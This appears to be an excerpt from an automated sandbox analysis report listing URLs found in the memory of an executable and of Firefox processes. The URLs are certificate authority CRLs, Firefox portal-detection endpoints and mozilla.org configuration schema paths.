Source: 79ddad050f.exe, 00000008.00000003.3032492622.0000000005919000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3229768373.0000000005951000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3635856106.000001C23D888000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 79ddad050f.exe, 00000008.00000003.3032492622.0000000005919000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3229768373.0000000005951000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3635856106.000001C23D888000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 0000001B.00000003.3247118953.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3610402766.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3155911537.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B4C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: 79ddad050f.exe, 00000008.00000003.3179670006.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000002.3262371223.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3093554780.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: 79ddad050f.exe, 00000008.00000003.3032492622.0000000005919000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3229768373.0000000005951000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3635856106.000001C23D888000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 79ddad050f.exe, 00000008.00000003.3032492622.0000000005919000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3229768373.0000000005951000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3635856106.000001C23D888000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 79ddad050f.exe, 00000008.00000003.3032492622.0000000005919000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3229768373.0000000005951000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3635856106.000001C23D888000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 79ddad050f.exe, 00000008.00000003.3032492622.0000000005919000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3229768373.0000000005951000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3635856106.000001C23D888000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 79ddad050f.exe, 00000008.00000003.3032492622.0000000005919000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3229768373.0000000005951000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3635856106.000001C23D888000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 0000001B.00000002.3640448626.000001C23DD70000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3187826061.000001C23F184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3640448626.000001C23DDA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3624693263.000001C23CC5B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3654754835.000001C23FD87000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3640448626.000001C23DD3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3652245578.000001C23F184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3651042917.000001C23ED53000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 0000001B.00000002.3646061223.000001C23E603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3628973173.000001C23CF21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437483944.000001C23A0C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.3653135084.000001C23FB7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3654754835.000001C23FD87000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3643180595.000001C23E0F8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3640448626.000001C23DD12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3263358958.000001E2D6CB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3267971841.00000235A5890000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.htmlACTIVITY_SUBTYPE_REQUEST_BODY_SENTbrowserDidUpgradeIns
Source: firefox.exe, 0000001B.00000002.3640448626.000001C23DD70000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437483944.000001C23A0C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.3624693263.000001C23CC5B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3643180595.000001C23E02D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3640448626.000001C23DD3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3286911695.000001C22C3D8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3436711953.000001C239BD8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3263358958.000001E2D6CB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3267971841.00000235A5890000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 0000001B.00000002.3646061223.000001C23E603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437483944.000001C23A0C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.3643180595.000001C23E02D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3438395331.000001C23B6A9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3263358958.000001E2D6CB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3267971841.00000235A5890000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 0000001B.00000002.3346346381.000001C237B8A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 0000001B.00000002.3346346381.000001C237B52000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/dates-and-times$
Source: firefox.exe, 0000001B.00000002.3346346381.000001C237B8A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 0000001B.00000002.3346346381.000001C237B52000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/regular-expressions
Source: firefox.exe, 0000001B.00000002.3346346381.000001C237B8A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 0000001B.00000002.3637244801.000001C23DABF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-04/schema#
Source: firefox.exe, 0000001B.00000002.3637244801.000001C23DABF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-06/schema#
Source: firefox.exe, 0000001B.00000002.3637244801.000001C23DABF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-07/schema#-
Source: firefox.exe, 0000001B.00000002.3637244801.000001C23DABF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/additionalProperties
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/aboutWelcomeBehavior
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsFeatureGate
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsShowLessFrequentlyCap
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsUITreatment
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryEnabled
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThreshold
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryUseCountThreshold
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bestMatchBlockingEnabled
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bestMatchEnabledresource://services-sync/constants.sys.mjs
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bestMatchEnabledresource://services-sync/constants.sys.mjsresource:/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/boolean
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/value/additiona
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/ratio
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/slug
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/enabled
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/featureId
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value/additiona
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/featureI
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/value
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/value/ad
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/itemshttps://www.mozilla.
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/ratio
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/slug
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/featureI
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value/ad
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/itemsbrowser.newtabpage.a
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/ratio
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/slug
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238527000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/count
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/namespace
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/randomizationUnit
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238527000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/start
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/cbhStudyRow
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/cbhStudyUs
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/csvImport
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/disableGreaseOnFallback
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/dnsMaxAnyPriorityThreads
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/dnsMaxPriorityThreads
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/ehPreconnectEnabled
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/ehPreloadEnabled
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/enabled
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/enrollmentEndDate
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/experimentType
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/exposureResults
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/extraParams
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/featureValidationOptOut
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/filterFetchResponse
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/forceWaitHttpsRR
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/greasePaddingSize
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/h3Enabled
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/h3GreaseEnabled
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/insecureFallbackhttp://mozilla.org/#/properties/tlsGreaseProb
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isBestMatchExperiment
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238527000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isEnrollmentPaused
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/javascriptValidator
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties/additionalProperties
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/1
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/mdnFeatureGate
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/mediaExceptionsStrategy
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoClientVariants
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoEnabled
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoEndpointURL
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoProviders
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoTimeoutMs
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/migrateExtensions
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/networkPredictor
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/originsAlternativeEnable
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/originsDaysCutOff
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/priority
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesAlternativeEnable
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesHalfLifeDays
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesHighWeight
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesLowWeight
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesMediumWeight
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesNumSampledVisits
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pocketFeatureGate
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pocketShowLessFrequentlyCap
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/preconnect
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/proposedEnrollment
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestAllowPositionInSuggestions
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestBlockingEnabled
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestDataCollectionEnabled
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestEnabled
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsNonSponsoredEnabled
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsSponsoredEnabled
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredEnabled
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredIndex
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestOnboardingDialogVariation
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsDataType
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsEnabled
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScenario
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScoreMap
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestShouldShowOnboardingDialog
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestShowOnboardingDialogAfterNRestarts
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredEnabled
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredIndex
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/recordNavigationalSuggestionTelemetry
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/richSuggestionsFeatureGate
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/serpEventTelemetryEnabled
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showExposureResults
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showImportAll
